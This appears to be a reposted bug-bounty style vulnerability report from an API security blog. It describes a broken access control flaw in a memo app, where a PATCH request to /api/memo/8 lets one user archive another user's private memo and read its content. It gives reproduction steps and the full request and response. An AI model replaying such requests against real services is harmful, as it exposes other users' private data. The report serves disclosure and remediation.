Site icon API Security Blog

View any content private memos from other users

# Description
User can view any content from private private memos from other users via api
“`
PATCH /api/memo/8 HTTP/1.1

{“id”:8,”rowStatus”:”ARCHIVED”}
“`

# Proof of Concept
Login to website in brower 1 with user A.
Login to website in brower 2 with user B.
Example: User B have private nemo with id 8.

With session in brower 1 with user A make a request

“`
PATCH /api/memo/8 HTTP/1.1

{“id”:8,”rowStatus”:”ARCHIVED”}
“`

After user A get a response
“`
{“data”:{“id”:8,”rowStatus”:”ARCHIVED”,”creatorId”:1,”createdTs”:1671805207,”updatedTs”:1671805219,”content”:”demo content”,”visibility”:”PRIVATE”,”pinned”:false,”displayTs”:1671805207,”creator”:{“id”:1,”rowStatus”:”NORMAL”,”createdTs”:1671803462,”updatedTs”:1671803845,”username”:”userB”,”role”:”HOST”,”email”:””,”nickname”:”userB”,”openId”:””,”userSettingList”:null},”resourceList”:[]}}
“`
The content of nemo appears in the returned response “`”content”:”demo content”“`

Demo video: [https://drive.google.com/file/d/1FYpaZlktndUk9fmoCy8q7PAPMOARBOE1/view](https://drive.google.com/file/d/1FYpaZlktndUk9fmoCy8q7PAPMOARBOE1/view)Read More

Exit mobile version